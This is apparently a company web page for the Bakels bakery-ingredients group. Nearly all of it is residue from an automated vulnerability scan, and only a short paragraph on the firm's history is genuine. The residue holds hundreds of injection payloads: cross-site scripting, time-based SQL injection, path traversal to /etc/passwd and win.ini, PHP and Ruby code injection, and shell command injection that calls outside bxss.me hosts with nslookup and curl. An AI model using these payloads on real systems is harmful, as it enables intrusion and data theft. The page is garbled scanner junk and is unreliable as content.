%31%3C%53%63%52%69%50%74%20%3E%63%6B%66%43%289199%29%3C%2F%73%43%72%69%70%54%3E

1<img/src=">" onerror=alert(9746)>

1<img/src=">" onerror=alert(9891)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9795'>

1<isindex type=image src=1 onerror=ckfC(9076)>

1<isindex type=image src=1 onerror=lA0Q(9968)>

1<svg

� onload=lA0Q(9930);>

1<svg

1<InvalidTag

>lA0Q(9427)</ScRiPt>

1<InvalidTag

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9369></ScRiPt>

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9571></ScRiPt>

1<InvalidTag

>lA0Q(9332)</ScRiPt>

1<InvalidTag

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%6C%41%30%51%28%39%32%33%36%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%63%6B%66%43%28%39%31%30%30%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<InvalidTag>lA0Q(9016)</script>9016

1<InvalidTag>ckfC(9328)</script>9328

1<InvalidTag>lA0Q(9147)</script>

1<InvalidTag>ckfC(9466)</script>

1<WYAJEC>SV4PF[!+!]</WYAJEC>

1<WPDAG6>C4KIW[!+!]</WPDAG6>

1<InvalidTag >lA0Q(9476)</ScRiPt>

1<InvalidTag >ckfC(9964)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb__${98991*97996}__::.x

dfb${98991*97996}::.x

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<th:t="${dfb}#foreach

<%={{={@{#{${dfb}}%>

bfgx2753%C0%BEz1%C0%BCz2a%90bcxhjl2753

bfgx10071%C0%BEz1%C0%BCz2a%90bcxhjl10071

bfg1255%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl1255

bfg3046%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl3046

19098072

19244500

'"()&%<zzz><InvalidTag >ckfC(9868)</ScRiPt>

'"()&%<zzz><InvalidTag >lA0Q(9619)</ScRiPt>

1'"()&%<zzz><InvalidTag >ckfC(9417)</ScRiPt>

1'"()&%<zzz><InvalidTag >lA0Q(9029)</ScRiPt>

1<aGBhELR<

1<aFpztBb<

1<img sRc='http://attacker-9058/log.php?

1<img sRc='http://attacker-9402/log.php?

1<aA7GYG0 x=9366>

1<ifRAme sRc=9305.com></IfRamE>

1<aabq5dl x=9229>

1<WLYB91>XZCIE[!+!]</WLYB91>

1<ifRAme sRc=9491.com></IfRamE>

12xYcu

1}body{zzz:Expre/**/SSion(xj92(9767))}

1<WDTHOT>57CY3[!+!]</WDTHOT>

1mR70r

1}body{zzz:Expre/**/SSion(07TX(9348))}

1<input autofocus onfocus=xj92(9224)>

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

�<img zzz onmouseover=xj92(96101) //�>

1<input autofocus onfocus=07TX(9384)>

1<ScRiPt>xj92(9145)</sCripT>

1\u003CScRiPt\xj92(9530)\u003C/sCripT\u003E

�<img zzz onmouseover=07TX(97441) //�>

1<ScRiPt>07TX(9467)</sCripT>

%31%3C%53%63%52%69%50%74%20%3E%78%6A%39%32%289472%29%3C%2F%73%43%72%69%70%54%3E

1\u003CScRiPt\07TX(9836)\u003C/sCripT\u003E

1<img/src=">" onerror=alert(9340)>

%31%3C%53%63%52%69%50%74%20%3E%30%37%54%58%289118%29%3C%2F%73%43%72%69%70%54%3E

1<img src=xyz OnErRor=xj92(9612)>

1<img src=//xss.bxss.me/t/dot.gif onload=xj92(9500)>

1<img/src=">" onerror=alert(9922)>

1<body onload=xj92(9188)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9650'>

1<img src=xyz OnErRor=07TX(9767)>

1<img src=//xss.bxss.me/t/dot.gif onload=07TX(9664)>

1<isindex type=image src=1 onerror=xj92(9992)>

1<body onload=07TX(9629)>

1<svg

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%30%37%54%58%28%39%38%37%39%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<WKR9VE>R00GP[!+!]</WKR9VE>

1<InvalidTag>07TX(9936)</script>9936

1<InvalidTag >xj92(9831)</ScRiPt>

1<InvalidTag>07TX(9506)</script>

1<W3O5AB>CZOTO[!+!]</W3O5AB>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

1<InvalidTag >07TX(9098)</ScRiPt>

dfb__${98991*97996}__::.x

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb[[${98991*97996}]]xca

dfb${98991*97996}::.x

dfb{{98991*97996}}xca

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<th:t="${dfb}#foreach

<%={{={@{#{${dfb}}%>

bfgx3310%C0%BEz1%C0%BCz2a%90bcxhjl3310

bfgx10149%C0%BEz1%C0%BCz2a%90bcxhjl10149

bfg7990%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl7990

bfg7457%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl7457

19095480

19310122

'"()&%<zzz><InvalidTag >07TX(9223)</ScRiPt>

'"()&%<zzz><InvalidTag >xj92(9307)</ScRiPt>

1'"()&%<zzz><InvalidTag >xj92(9035)</ScRiPt>

1'"()&%<zzz><InvalidTag >07TX(9742)</ScRiPt>

@@62PDf

��%2527%2522\'\"

'"

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1J0tfzoGy')) OR 763=(SELECT 763 FROM PG_SLEEP(15))--

1hLeTcdSO') OR 884=(SELECT 884 FROM PG_SLEEP(15))--

1rA1zLdkj' OR 595=(SELECT 595 FROM PG_SLEEP(15))--

1-1)) OR 608=(SELECT 608 FROM PG_SLEEP(15))--

1-1 OR 823=(SELECT 823 FROM PG_SLEEP(15))--

1kjvBhHIv')); waitfor delay '0:0:15' --

16UpWdtaQ'); waitfor delay '0:0:15' --

1VIDdrIDT'; waitfor delay '0:0:15' --

1-1 waitfor delay '0:0:15' --

1-1)); waitfor delay '0:0:15' --

1-1); waitfor delay '0:0:15' --

1-1; waitfor delay '0:0:15' --

(select(0)from(select(sleep(15)))v)/'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"/

10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z

10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z

WEB-INF\web.xml

WEB-INF/web.xml

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1*if(now()=sysdate(),sleep(15),0)

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

..\..\..\..\..\..\..\..\windows\win.ini

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

;(nslookup -q=cname hitikljxupcje270e6.bxss.me||curl hitikljxupcje270e6.bxss.me)|(nslookup -q=cname hitikljxupcje270e6.bxss.me||curl hitikljxupcje270e6.bxss.me)&(nslookup -q=cname hitikljxupcje270e6.bxss.me||curl hitikljxupcje270e6.bxss.me)

/../../../../../../../../../../boot.ini

../../../../../../../../../../windows/win.ini%00.jpg

`(nslookup -q=cname hitxwvhsjthwd02888.bxss.me||curl hitxwvhsjthwd02888.bxss.me)`

C:\WINDOWS\system32\drivers\etc\hosts

|(nslookup -q=cname hitajpdgnxkin117ee.bxss.me||curl hitajpdgnxkin117ee.bxss.me)

/\xfs.bxss.me?hkbakels.com.hk

file:///etc/passwd

//xfs.bxss.me?hkbakels.com.hk

&(nslookup -q=cname hitpuqcvuagmjd73b1.bxss.me||curl hitpuqcvuagmjd73b1.bxss.me)&'\"`0&(nslookup -q=cname hitpuqcvuagmjd73b1.bxss.me||curl hitpuqcvuagmjd73b1.bxss.me)&`'

../../../../../../../../../../../../../../windows/win.ini

xfs.bxss.me?hkbakels.com.hk

&nslookup -q=cname hitepohtmjvlz6577e.bxss.me&'\"`0&nslookup -q=cname hitepohtmjvlz6577e.bxss.me&`'

$(nslookup -q=cname hitogsgnwlfplb7fb4.bxss.me||curl hitogsgnwlfplb7fb4.bxss.me)

../../../../../../../../../../../../../../etc/passwd

http://xfs.bxss.me?hkbakels.com.hk

(nslookup -q=cname hitnuqdtcxvpwed66b.bxss.me||curl hitnuqdtcxvpwed66b.bxss.me))

929838

bxss.me

|echo huebvv$()\ ftwjtc\nz^xyu||a #' |echo huebvv$()\ ftwjtc\nz^xyu||a #|" |echo huebvv$()\ ftwjtc\nz^xyu||a #

xfs.bxss.me

c:/windows/win.ini

&echo tlvppd$()\ xjezgu\nz^xyu||a #' &echo tlvppd$()\ xjezgu\nz^xyu||a #|" &echo tlvppd$()\ xjezgu\nz^xyu||a #

/etc/shells

-1" OR 3*2>(0+5+872-872) --

-1" OR 3*2<(0+5+872-872) --

http://bxss.me/t/fit.txt%3F.jpg

echo inaxwh$()\ ysxvol\nz^xyu||a #' &echo inaxwh$()\ ysxvol\nz^xyu||a #|" &echo inaxwh$()\ ysxvol\nz^xyu||a #

-1" OR 3+872-872-1=0+0+0+1 --

Http://bxss.me/t/fit.txt

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

-1" OR 2+872-872-1=0+0+0+1 --

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

-1' OR 3*2>(0+5+611-611) or 'rxeMuW7A'='

-1' OR 3*2<(0+5+611-611) or 'rxeMuW7A'='

-1' OR 3+611-611-1=0+0+0+1 or 'rxeMuW7A'='

-1' OR 2+611-611-1=0+0+0+1 or 'rxeMuW7A'='

-1' OR 3*2>(0+5+808-808) --

-1' OR 3*2<(0+5+808-808) --

-1' OR 3+808-808-1=0+0+0+1 --

-1' OR 2+808-808-1=0+0+0+1 --

-1 OR 3*2>(0+5+549-549)

Mr.

555

19525404

'"()&%<zzz><InvalidTag >XyBV(9773)</ScRiPt>

1'"()&%<zzz><InvalidTag >XyBV(9092)</ScRiPt>

-1 OR 3*2<(0+5+549-549)

<!--

./Mr.

555

../Mr.

555

../Mr.

555

Mr.

555

-1 OR 3*2<(0+5+236-236) --

-1 OR 3+236-236-1=0+0+0+1 --

../../../../../../../../../../../../../../etc/passwd

555

${@print(md5(31337))}\

-1 OR 2+236-236-1=0+0+0+1 --

${@print(md5(31337))}

19355105

Mr.

555

";print(md5(31337));$a="

'"()&%<zzz><InvalidTag >XyBV(9615)</ScRiPt>

1'"()&%<zzz><InvalidTag >XyBV(9591)</ScRiPt>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

/\xfs.bxss.me?hkbakels.com.hk

Mr.

555

WEB-INF\web.xml

//xfs.bxss.me?hkbakels.com.hk

"||sleep(27*1000)*ifyvpd||"

"+response.write(9479192*9498010)+"

';print(md5(31337));$a='

'||sleep(27*1000)*tqhddk||'

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

'+response.write(9479192*9498010)+'

<!--

WEB-INF/web.xml

'"

xfs.bxss.me?hkbakels.com.hk

Mr.

555

"&&sleep(27*1000)*yrsrld&&"

http://xfs.bxss.me?hkbakels.com.hk

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

bxss.me/t/xss.html?%00

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'&&sleep(27*1000)*apvnsp&&'

993974

response.write(9479192*9498010)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

HttP://bxss.me/t/xss.html?%00

'+'A'.concat(70-3).concat(22*4).concat(112).concat(87).concat(117).concat(69)+(require'socket'

Socket.gethostbyname('hiths'+'vcgpvlcbc24a3.bxss.me.')[3].to_s)+'

xfs.bxss.me

bxss.me

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

'"()

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

Mr.

555

'+response.write(9217542*9603369)+'

c:/windows/win.ini

555

&(nslookup -q=cname hitloklvudrab7f8e8.bxss.me||curl hitloklvudrab7f8e8.bxss.me)&'\"`0&(nslookup -q=cname hitloklvudrab7f8e8.bxss.me||curl hitloklvudrab7f8e8.bxss.me)&`'

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

response.write(9217542*9603369)

../../../../../../../../../../windows/win.ini%00.jpg

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

/etc/shells

Mr.

../555

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.

555

${9999978+9999253}

../../../../../../../../../../../../../../etc/passwd

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.

555

Mr.

555

$(nslookup -q=cname hitvbtdnlpfsod112c.bxss.me||curl hitvbtdnlpfsod112c.bxss.me)

Mr.

555

555

Mr.

../../../../../../../../../../../../../../etc/passwd

/../../../../../../../../../../windows/system32/BITSADMIN.exe

"||sleep(271000)vhwojf||"

|echo vinurb$()\ ppoltm\nz^xyu||a #' |echo vinurb$()\ ppoltm\nz^xyu||a #|" |echo vinurb$()\ ppoltm\nz^xyu||a #

&n982075=v953946

VlJoAKtB

'.print(md5(31337)).'

&echo xydotr$()\ alvfnw\nz^xyu||a #' &echo xydotr$()\ alvfnw\nz^xyu||a #|" &echo xydotr$()\ alvfnw\nz^xyu||a #

Mr.

555

Mr.

555

'||sleep(271000)ssowkh||'

echo rvjtht$()\ wyjgti\nz^xyu||a #' &echo rvjtht$()\ wyjgti\nz^xyu||a #|" &echo rvjtht$()\ wyjgti\nz^xyu||a #

${@print(md5(31337))}\

${@print(md5(31337))}

^(#$!@#$)(()))******

Mr.

555

"&&sleep(271000)wnrlus&&"

";print(md5(31337));$a="

/../../../../../../../../../../windows/system32/BITSADMIN.exe

uj2hW7b3

".gethostbyname(lc("hitlx"."rczcwfkq073f9.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(90).chr(115).chr(69)."

Mr.

555

Mr.

555

';print(md5(31337));$a='

'.gethostbyname(lc('hitta'.'tcszoulp2ed66.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(84).chr(116).chr(75).'

'&&sleep(271000)wqsqxx&&'

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

&n980585=v947822

!(()&&!|||

'"()

Mr.

555

Mr.

555

Mr.

555

555

Mr.

555

Mr.

555

"+"A".concat(70-3).concat(22*4).concat(113).concat(70).concat(101).concat(79)+(require"socket"

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

c:/windows/win.ini

Mr.

./555

Mr.

555

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

'.print(md5(31337)).'

555

Mr.

555

Mr.

555

${@print(md5(31337))}\

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

".gethostbyname(lc("hitur"."oetuulfsbfbef.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(83).chr(122).chr(77)."

555

Mr.

555

Mr.

555

'.gethostbyname(lc('hitpw'.'lecjuuhte5f40.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(78).chr(103).chr(81).'

555

Mr.

555

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

555

555

Mr.

555

Mr.

'+'A'.concat(70-3).concat(22*4).concat(109).concat(80).concat(119).concat(72)+(require'socket'

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Bernard-bakels The Bakels Group owes its name to the Dutch merchant brothers Bakels who registered the Gebr. Bakels company in Amsterdam, Netherlands in 1904. It was however the son of one of the brothers referred to above, Bernard J Bakels who would be the one to make the name Bakels known further afield than Central Europe.

Today the Bakels Group is truly global, represented on all continents through own manufacturing companies and slected agents. Bakels products are available to the bakery and confectionery industries in more than 120 countries.

Mr.

555